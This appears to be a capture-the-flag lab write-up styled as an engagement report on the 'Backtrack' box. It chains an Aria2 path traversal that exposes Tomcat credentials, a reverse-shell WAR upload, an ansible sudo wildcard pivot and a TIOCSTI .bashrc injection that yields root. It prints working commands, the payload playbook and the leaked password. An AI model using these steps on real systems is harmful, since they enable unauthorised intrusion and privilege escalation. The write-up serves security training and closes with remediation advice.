Aria2 LFI, Tomcat WAR deploy, and Ansible path traversal
Foundations Linux engagement: CVE-2023-39141 on Aria2 disclosed Tomcat credentials; WAR deploy yielded tomcat; sudo ansible-playbook wildcards pivoted to wilbur; internal gallery upload and TTY pushback completed root.
- Case files
- Aria2 LFI, Tomcat WAR deploy, and Ansible path traversal
Aria2 path traversal leaked tomcat-users.xml. Manager-script WAR deploy opened a shell; ansible sudo wildcards and an internal upload chain reached root via TTY injection.
Path traversal read tomcat-users.xml; WAR deploy returned a reverse shell as tomcat.
Path traversal under /opt/test_playbooks/*.yml executed an attacker playbook as wilbur.
Tunneled gallery upload as orville; .bashrc TIOCSTI planted SUID bash when root su’d without -P.
Engagement summary
Aria2 path traversal leaked tomcat-users.xml. Manager-script WAR deploy opened a shell; ansible sudo wildcards and an internal upload chain reached root via TTY injection.
BACKTRACK (backtrack.thm) exposed Tomcat on 8080 and Aria2 WebUI on 8888. CVE-2023-39141 path traversal read /opt/tomcat/conf/tomcat-users.xml (tomcat / OPx52k53D8OkTZpx4fr, manager-script). A msfvenom WAR deployed via manager/text gave a tomcat shell. sudo -l allowed ansible-playbook /opt/test_playbooks/*.yml as wilbur — path traversal to /dev/shm/shell.yml pivoted. wilbur’s notes held orville gallery credentials; SSH tunnel to localhost:80 plus double-encoded upload traversal yielded orville. Root periodically ran su - orville without -P; TIOCSTI pushback via .bashrc planted SUID bash.
Business impact
Unauthenticated Aria2 file disclosure is credential theft. Tomcat manager-script without network controls is RCE. Sudo wildcards on ansible-playbook and TTY injection on shared sessions are root. Patch Aria2, lock Tomcat manager, pin playbook paths, and use su -P / sudo -i for privileged switches.
Aria2 LFI and Tomcat WAR RCE
Path traversal read tomcat-users.xml; WAR deploy returned a reverse shell as tomcat.
OPERATOR · ARIA2 / TOMCAT
savvy@lab:~$ echo '10.48.132.202 backtrack.thm' | sudo tee -a /etc/hosts
savvy@lab:~$ curl --path-as-is 'http://backtrack.thm:8888/../../../../../../opt/tomcat/conf/tomcat-users.xml'
tomcat / OPx52k53D8OkTZpx4fr role=manager-script
savvy@lab:~$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=OPERATOR_IP LPORT=4444 -f war -o exploit.war
savvy@lab:~$ nc -lnvp 4444
savvy@lab:~$ curl -u tomcat:OPx52k53D8OkTZpx4fr --upload-file exploit.war "http://backtrack.thm:8080/manager/text/deploy?path=/foo&update=true"
savvy@lab:~$ curl http://backtrack.thm:8080/foo/
savvy@lab:/$ id
Ansible wildcard to wilbur
Path traversal under /opt/test_playbooks/*.yml executed an attacker playbook as wilbur.
PAYLOAD
shell.yml
- hosts: localhost
tasks:
- shell: /bin/sh /dev/tty 2>/dev/ttyOPERATOR · ANSIBLE
savvy@lab:~$ sudo -l
(wilbur) NOPASSWD: /usr/bin/ansible-playbook /opt/test_playbooks/*.yml
savvy@lab:~$ sudo -u wilbur /usr/bin/ansible-playbook /opt/test_playbooks/../../dev/shm/shell.yml
savvy@lab:~$
Gallery upload and TTY pushback root
Tunneled gallery upload as orville; .bashrc TIOCSTI planted SUID bash when root su’d without -P.
OPERATOR · ROOT
savvy@lab:~$ ssh wilbur@10.48.132.202 -L 5555:127.0.0.1:80
# gallery login orville; double-encode ../ upload → shell as orville
# append TIOCSTI injector to ~/.bashrc; wait for root: su - orville
savvy@lab:~$ /bin/bash -p
root@lab:~# id
uid=0(root) gid=0(root) groups=0(root)
Remediation
Patch Aria2; authenticate and firewall Tomcat manager. Replace ansible sudo wildcards with absolute playbook paths. Harden gallery uploads; use su -P for privileged account switches.